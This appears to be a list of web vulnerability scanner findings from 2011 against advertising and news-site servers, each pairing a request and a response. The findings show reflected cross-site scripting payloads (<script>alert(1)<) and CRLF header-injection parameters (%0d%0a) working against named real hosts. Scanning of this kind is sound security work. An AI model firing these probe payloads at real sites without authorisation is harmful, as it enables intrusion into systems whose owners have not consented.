HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 04:02:57 GMT Server: Apache/2.0.52 (CentOS) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Set-Cookie: crtg=c8998 6cd6f44de8f; expires=Tue, 04-Oct-11 04:02:57 GMT; path=/; domain=.masslive.com Content-Type: text/plain; charset=UTF-8 Location: /RealMedia/ads/Creatives Cneonction: close Content-Length: 0 Set-Cookie: NSC_mc-pbt-qspe-ef |
Severity: | High |
Confidence: | Certain |
Host: | http://ads.mlive.com |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: ads.mlive.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://dis.sv.us.criteo Cookie: crtg=1 |
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 04:02:07 GMT Server: Apache/2.0.52 (CentOS) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Set-Cookie: a5e27 56b30a2b4ac=1; expires=Tue, 04-Oct-11 04:02:07 GMT; path=/; domain=.mlive.com Content-Type: text/plain; charset=UTF-8 Location: /RealMedia/ads/Creatives Cneonction: close Content-Length: 0 Set-Cookie: NSC_mc-pbt-qspe-ef |
Severity: | High |
Confidence: | Certain |
Host: | http://ads.mlive.com |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: ads.mlive.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://dis.sv.us.criteo Cookie: crtg=1 |
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 04:03:08 GMT Server: Apache/2.0.52 (CentOS) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Set-Cookie: crtg=4239b 9a751c9a568; expires=Tue, 04-Oct-11 04:03:08 GMT; path=/; domain=.mlive.com Content-Type: text/plain; charset=UTF-8 Location: /RealMedia/ads/Creatives nnCoection: close Content-Length: 0 Set-Cookie: NSC_mc-pbt-qspe-ef |
Severity: | High |
Confidence: | Certain |
Host: | http://ads.oregonlive.com |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: ads.oregonlive.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://dis.sv.us.criteo Cookie: crtg=1 |
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 04:00:49 GMT Server: Apache/2.0.52 (CentOS) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Set-Cookie: e8c13 b3daaf667e6=1; expires=Tue, 04-Oct-11 04:00:49 GMT; path=/; domain=.oregonlive.com Content-Type: text/plain; charset=UTF-8 Location: /RealMedia/ads/Creatives nnCoection: close Content-Length: 0 Set-Cookie: NSC_mc-pbt-qspe-ef |
Severity: | High |
Confidence: | Certain |
Host: | http://ads.oregonlive.com |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: ads.oregonlive.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://dis.sv.us.criteo Cookie: crtg=1 |
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 04:02:14 GMT Server: Apache/2.0.52 (CentOS) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Set-Cookie: crtg=defe0 53610917434; expires=Tue, 04-Oct-11 04:02:14 GMT; path=/; domain=.oregonlive.com Content-Type: text/plain; charset=UTF-8 Location: /RealMedia/ads/Creatives Cneonction: close Content-Length: 0 Set-Cookie: NSC_mc-pbt-qspe-ef |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-504/d2/jsc/fm.js |
GET /bar/v16-504/d2/jsc/fm.js Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.ndtv.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZFFBbh=977B826,20|121_977 |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1185:aa378$767:8aac2 98846847a98;expires=Sun, 04 Sep 2011 05: 00:00 GMT;domain=.zedo.com;path Set-Cookie: FFcat=826,471,14:767,4,14 Set-Cookie: FFad=42:60:31:31:31:None ETag: "182787-8952-4aa4dd2 Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=169 Expires: Sun, 04 Sep 2011 02:36:55 GMT Date: Sun, 04 Sep 2011 02:34:06 GMT Content-Length: 5179 Connection: close // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var y10=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=0;var zzPat=',8aac2 9 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-504/d8/jsc/fm.js |
GET /bar/v16-504/d8/jsc/fm.js Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.dnaindia.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZFFBbh=977B826,20|121_977 |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1185:aa378 da9d31b7676,cb964';expires=Sun, 04 Sep 2011 05: 00:00 GMT;domain=.zedo.com;path Set-Cookie: FFcat=1185,589,14:1185 Set-Cookie: FFad=7:31:31:None;expires ETag: "4368e0d-8952-4aa4df Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=144 Expires: Sun, 04 Sep 2011 02:34:38 GMT Date: Sun, 04 Sep 2011 02:32:14 GMT Content-Length: 4571 Connection: close // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var y10=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=76;var zzPat='aa378 d ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /utils/ecSet.js |
GET /utils/ecSet.js?v=230a8%0d%0a11aff24a572&d=.zedo.com HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.dnaindia.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZFFBbh=977B826,20|121_977 |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 1 Content-Type: application/x-javascript Set-Cookie: 230a8 11aff24a572;expires=Tue, 04 Oct 2011 05: 00:00 GMT;domain=.zedo.com;path ETag: "3a9d5cb-1f5-47f2908 Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=4098 Date: Sun, 04 Sep 2011 02:31:53 GMT Connection: close |
Severity: | High |
Confidence: | Certain |
Host: | http://dp.33across.com |
Path: | /ps/ |
GET /ps/?pid=533 HTTP/1.1 Host: dp.33across.com Proxy-Connection: keep-alive Referer: http://d3.zedo.com/jsc/d3 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: 33x_ps=u%3D9035684957 |
HTTP/1.1 302 Moved Temporarily Date: Sun, 04 Sep 2011 02:42:53 GMT P3P: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA" Set-Cookie: 33x_ps=u%3D9035684957 Location: http://ib.adnxs.com d466519e7bc&redir=http%3A%2F%2Fad Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
Severity: | High |
Confidence: | Certain |
Host: | http://login.dotomi.com |
Path: | /ucm/UCMController |
GET /ucm/UCMController?dtm Host: login.dotomi.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: rt_1982=2; DotomiUser=230900890 |
HTTP/1.1 302 Moved Temporarily Date: Sun, 04 Sep 2011 11:25:04 GMT X-Name: dmc-s01 Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Cache-Control: no-cache, private P3P: "policyref="/w3c/p3p.xml" Set-Cookie: DotomiStatus=5; Domain=.dotomi.com; Expires=Fri, 02-Sep-2016 11:25:04 GMT; Path=/ Location: http://login.dotomi.com 2c2c5bc8c57 Content-Type: text/html Content-Length: 0 |
Severity: | High |
Confidence: | Certain |
Host: | http://oas.guardian.co.uk |
Path: | /adstream.cap/b181bae0 |
GET /adstream.cap/e17c4%0d%0a7333c9dabee HTTP/1.1 Host: oas.guardian.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 400 Bad Request Date: Sun, 04 Sep 2011 04:16:57 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p OAS_DE_ERROR: OAS-Cap: No query string found. request to 'oas.guardian.co.uk' for '/adstream.cap/e17c4 7333c9dabee', referer '', handler 'cap-add' Content-Length: 310 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>400 Bad Request</title> </head><body> <h1>Bad Request</h1> <p>Your browser sent a request that this server could not understand.< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://oas.guardian.co.uk |
Path: | /adstream.cap/b181bae0 |
GET /adstream.cap/b181bae0 Host: oas.guardian.co.uk User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://dis.sv.us.criteo |
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 04:00:19 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Set-Cookie: f3bcd 01cbdde2839=1; expires=Tue, 04-Oct-11 04:00:19 GMT; path=/; domain=.guardian.co.uk Location: /RealMedia/ads/Creatives Connection: close Content-Length: 0 Content-Type: text/plain |
Severity: | High |
Confidence: | Certain |
Host: | http://oas.guardian.co.uk |
Path: | /adstream.cap/b181bae0 |
GET /adstream.cap/b181bae0 Host: oas.guardian.co.uk User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://dis.sv.us.criteo |
HTTP/1.1 500 Internal Server Error Date: Sun, 04 Sep 2011 04:01:01 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p OAS_DE_ERROR: error converting 'e3c48 e00512b83fa' value to numeric value [i]. request to 'oas.guardian.co.uk' for '/adstream.cap/b181bae0 Content-Length: 618 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>500 Internal Server Error</title> </head><body> <h1>Internal Server Error</h1> <p>The server encountered an internal error or mis ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://oasc12.247rea |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: oasc12.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 400 Bad Request Date: Sun, 04 Sep 2011 04:18:33 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p OAS_DE_ERROR: OAS-Cap: No query string found. request to 'oasc12.247realmedia.com' for '/RealMedia/ads/adstream 6fed33b49d9', referer '', handler 'cap-add' Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>400 Bad Request</title> </head><body> <h1>Bad Request</h1> <p>Your browser sent a request that this server could not understand.< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://oasc12.247rea |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: oasc12.247realmedia.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://dis.sv.us.criteo Cookie: OAX=Mhd7ak5JOcoADoVu; NSC_d12efm_qppm_iuuq |
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 03:59:44 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Set-Cookie: f35db 0df7bbf4cf1=1; expires=Tue, 04-Oct-11 03:59:44 GMT; path=/; domain=.247realmedia.com Location: /RealMedia/ads/Creatives Connection: close Content-Length: 0 Content-Type: text/plain |
Severity: | High |
Confidence: | Certain |
Host: | http://oasc12.247rea |
Path: | /RealMedia/ads/adstream |
GET /RealMedia/ads/adstream Host: oasc12.247realmedia.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://dis.sv.us.criteo Cookie: OAX=Mhd7ak5JOcoADoVu; NSC_d12efm_qppm_iuuq |
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 04:00:17 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Set-Cookie: martinicrt=9024a 74cf762925; expires=Tue, 04-Oct-11 04:00:17 GMT; path=/; domain=.247realmedia.com Location: /RealMedia/ads/Creatives Connection: close Content-Length: 0 Content-Type: text/plain |
Severity: | High |
Confidence: | Certain |
Host: | http://optout.crwdcntrl |
Path: | /optout |
GET /optout?d=http://optout Host: optout.crwdcntrl.net Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cc=optout |
HTTP/1.1 302 Moved Temporarily Date: Sun, 04 Sep 2011 11:24:22 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Fri, 22-Sep-2079 14:38:29 GMT Location: http://optout.crwdcntrl 18e4734e5e9&ct=Y Vary: Accept-Encoding Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
Severity: | High |
Confidence: | Certain |
Host: | http://optout.crwdcntrl |
Path: | /optout |
GET /optout?d=38b21%0d%0a9f976ce8cc0 HTTP/1.1 Host: optout.crwdcntrl.net Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Moved Temporarily Date: Sun, 04 Sep 2011 11:18:13 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Fri, 22-Sep-2079 14:32:20 GMT Location: http://optout.crwdcntrl 9f976ce8cc0&ct=Y Vary: Accept-Encoding Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
Severity: | High |
Confidence: | Certain |
Host: | http://optout.crwdcntrl |
Path: | /optout |
GET /optout?d=http://optout Host: optout.crwdcntrl.net Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Moved Temporarily Date: Sun, 04 Sep 2011 11:18:20 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT Set-Cookie: cc=optout; Domain=.crwdcntrl.net; Expires=Fri, 22-Sep-2079 14:32:27 GMT Location: http://optout.crwdcntrl a6834fe02bc=1&ct=Y Vary: Accept-Encoding Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
Severity: | High |
Confidence: | Certain |
Host: | http://t.mookie1.com |
Path: | /t/v1/event |
GET /t/v1/event?migClientId Host: t.mookie1.com Proxy-Connection: keep-alive Referer: http://static.eplayer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: OAX=Mhd7ak5iycEADA/r; id=4612741554684080402; mdata=1|461274155468 |
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 03:24:04 GMT Server: Apache/2.0.52 (Red Hat) Cache-Control: no-cache Pragma: no-cache P3P: CP="NOI DSP COR NID CUR OUR NOR" Set-Cookie: id=914807826538115; path=/; expires=Wed, 03-Oct-12 03:24:04 GMT; path=/; domain=.mookie1.com Set-Cookie: mdata=1|914807826538115 Location: http://uav.tidaltv.com c678bd8e895 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 |
Severity: | High |
Confidence: | Certain |
Host: | http://223.165.24.159 |
Path: | /toiwidget/jsp/widget.jsp |
GET /toiwidget/jsp/widget.jsp Host: 223.165.24.159 Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:36:28 GMT Server: Apache/2.2.16 (Unix) DAV/2 PHP/5.2.14 mod_jk/1.2.30 X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA Content-Type: text/html;charset=ISO Content-Length: 11324 <link href="../css/style.css" rel="stylesheet" type="text/css" /><div class="box"> <h2> <div class="fl" id="cityId"></div> <div class="fr" style="width:85px; text-align:right; mar ...[SNIP]... <div class="fl">Properties in Mumbai645c6<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://223.165.24.159 |
Path: | /toiwidget/jsp/widget.jsp |
GET /toiwidget/jsp/widget.jsp Host: 223.165.24.159 Proxy-Connection: keep-alive Referer: http://timesofindia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:36:25 GMT Server: Apache/2.2.16 (Unix) DAV/2 PHP/5.2.14 mod_jk/1.2.30 X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA Content-Type: text/html;charset=ISO Content-Length: 11223 <link href="../css/style.css" rel="stylesheet" type="text/css" /><div class="box"> <h2> <div class="fl" id="cityId"></div> <div class="fr" style="width:85px; text-align:right; mar ...[SNIP]... <script type="text/javascript"> var city='Mumbai953b0';alert(1)/ var originalCity = city; var casechanged = city.toLowerCase(); var lengthCount = 0; if(casechanged == 'Thiruvananthapuram') city = 'Thiru\'puram'; city = 'Jobs in '+city; lengthCount = ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://ad4.liverail.com |
Path: | / |
GET /?e51a9<a>bf5706f66a9=1 HTTP/1.1 Host: ad4.liverail.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, max-age=0 Pragma: no-cache Expires: Tue, 29 May 1984 15:00:00 GMT Content-type: text/xml; charset=UTF-8 Connection: close Date: Sun, 04 Sep 2011 04:06:38 GMT Server: lighttpd/1.4.28 Content-Length: 181 <?xml version="1.0" encoding="utf-8"?> <liverail content='error' version='3.0-10.166.49.10 |
Severity: | High |
Confidence: | Certain |
Host: | http://addoer.com |
Path: | /showfixads.php |
GET /showfixads.php?tabname Host: addoer.com Proxy-Connection: keep-alive Referer: http://www.nationmul User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Connection: close P3P: CP=NOI DSP COR NID ADMa OUR IND NAV; policyref="/w3c/p3p.xml" X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Type: application/x-javascript Date: Sun, 04 Sep 2011 02:25:16 GMT Server: Sun Java System Content-Length: 135 get domain from : http://paidoo.net/get_dom alert(1)//1a736eeaaa3&code=d835fd240569ce |
Severity: | High |
Confidence: | Certain |
Host: | http://ads.bluelithium |
Path: | /st |
GET /st?ad_type=iframe&ad Host: ads.bluelithium.com Proxy-Connection: keep-alive Referer: http://d3.zedo.com/jsc/d3 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:42:52 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Sun, 04 Sep 2011 02:42:52 GMT Pragma: no-cache Content-Length: 4667 Age: 0 Proxy-Connection: close <html><head></head><body> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ads.bluelithium |
Path: | /st |
GET /st?ad_type=iframe&ad Host: ads.bluelithium.com Proxy-Connection: keep-alive Referer: http://d3.zedo.com/jsc/d3 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:42:52 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Sun, 04 Sep 2011 02:42:52 GMT Pragma: no-cache Content-Length: 4715 Age: 0 Proxy-Connection: close <html><head></head><body> ...[SNIP]... <a href="http://ads ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ads3.bangkokpost |
Path: | /www/delivery/spc.php |
GET /www/delivery/spc.php Host: ads3.bangkokpost.co.th Proxy-Connection: keep-alive Referer: http://www.bangkokpost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:25:49 GMT Server: Apache/2.2.10 (Win32) PHP/5.2.13 X-Powered-By: PHP/5.2.13 Pragma: no-cache Cache-Control: private, max-age=0, no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Set-Cookie: OAID=7580d7a472c1671 Set-Cookie: OAID=7580d7a472c1671 Set-Cookie: OAID=7580d7a472c1671 Set-Cookie: OAID=7580d7a472c1671 P3P: CP="CUR ADM OUR NOR STA NID" Content-Size: 1967 Vary: User-Agent,Accept Content-Length: 1967 Content-Type: application/x-javascript; charset=UTF-8 OA_output['120'] = ''; OA_output['127'] = ''; OA_output['170'] = ''; OA_output['c8036<script>alert(1)< OA_output['c8036<script ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ads4.bangkokpost |
Path: | /ads_server/iframe |
GET /ads_server/iframe?&SITE Host: ads4.bangkokpost.co.th Proxy-Connection: keep-alive Referer: http://www.bangkokpost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
